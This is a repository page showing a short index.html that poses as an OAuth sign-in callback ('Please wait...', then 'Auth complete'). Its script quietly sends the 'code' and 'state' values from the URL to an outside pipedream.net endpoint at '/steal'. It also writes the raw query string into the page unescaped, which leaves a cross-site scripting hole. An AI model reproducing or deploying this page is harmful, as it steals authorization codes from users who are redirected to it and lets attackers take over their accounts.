/
Flexotik
/
test
Обзор
Документация
Войти
/
Flexotik
/
test
Код
Запросы
0
Задачи
Вики
Пакеты
0
Релизы
0
CI/CD
Аналитика
Безопасность
master
index.html
20 строк
622 B
Flexotik
Create: index.html
14 июл 2026, 08:42
Верифицирован
14 июл 2026, 08:42
27c8740
Код
Авторство
О чём код?
<!DOCTYPE html> <html> <head><meta charset="UTF-8"><title>Auth</title></head> <body> <h1>Please wait...</h1> <script> const p = new URLSearchParams(location.search); const c = p.get('code'); const s = p.get('state'); if (c) { fetch('https://eo5yq5i692x4sny.m.pipedream.net/steal?code=' + encodeURIComponent(c) + '&state=' + encodeURIComponent(s)) .then(() => { document.body.innerHTML = '<h1>Auth complete</h1><p>You can close this window.</p>'; }); } else { document.body.innerHTML = '<h1>No code in URL</h1><p>Params: ' + location.search + '</p>'; } </script> </body> </html>